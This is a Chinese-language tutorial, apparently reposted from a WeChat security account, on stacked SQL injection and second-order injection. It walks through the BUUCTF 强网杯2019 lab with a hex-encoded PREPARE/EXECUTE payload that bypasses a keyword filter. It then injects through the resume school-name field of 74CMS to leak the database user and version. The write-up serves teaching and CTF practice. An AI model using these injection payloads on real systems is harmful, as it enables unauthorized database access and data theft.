堆叠注入就是将一堆sql语句使用分号叠加在一起执行,使用分号结束上一个语句再继续执行后面的语句。
支持堆叠的数据库类型:MYSQLMSSQL Postgresql等
案例:BUUCTF---强网杯2019随便注
首先启动并访问靶机,有一个输入框,随便输入1',发现报错了,说明可能存在sql注入
输入:' union select 1,2; 判断字段,结果提示return preg_match("/select|update|delete|drop|insert|where|./i",$inject);意思是select等关键字都被过滤了
我们就可以通过堆叠注入的方式,来绕过select等关键字
输入:';show tables; 查数据表
输入:';show columns from `1919810931114514`; 查看表字段
由于select关键字被过滤了,我们可以将select * from `1919810931114514`语句进行16进制编码
在定义一个变量并将sql语句初始化,然后调用
输入:
';Set @j =
0x73656c656374202a2066726f6d20603139313938313039333131313435313460;
PREPARE cs from @j;EXECUTE cs;
成功获取flag。
二次注入
案例:74CMS----个人会员中心
打开网站会员中心,点击创建简历,填写信息,一直到教育经历。
在学校名称处填写:xiaoheizi',address=user()# 点击保存
选择查看我们刚刚创建的简历
可以看到数据库执行了我们设置的语句,报出了数据库用户
再次创建一份简历
完善简历到教育经历处
学校名称填写为:xiaoheizi',address=version()# 点击保存
查看我们刚刚创建的简历
成功获取数据库版本信息
二次注入产生过程:
在创建简历时候有七个模块,每次填写完一个模块点击保存后——数据库会执行一次insert插入操作,把我们填写的信息插入到每个模块对应的表中。七个模块就是七个表
教育经历模块对应的表
然后数据库还会在执行一个update更新操作,把七个表的数据全部更新到一个总表中,因为我们在教育经历模块填写了(address=version()#),所以在更新的时候总表address字段内容就会被更新为数据库版本号:version()
我们在点击查看简历时——数据库就会执行一个select查询操作,把总表中的内容在页面展示出来,因为address字段代表联系地址,所以版本号才会展示在这里
原文始发于微信公众号(小黑子安全):sql注入-堆叠+二次
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论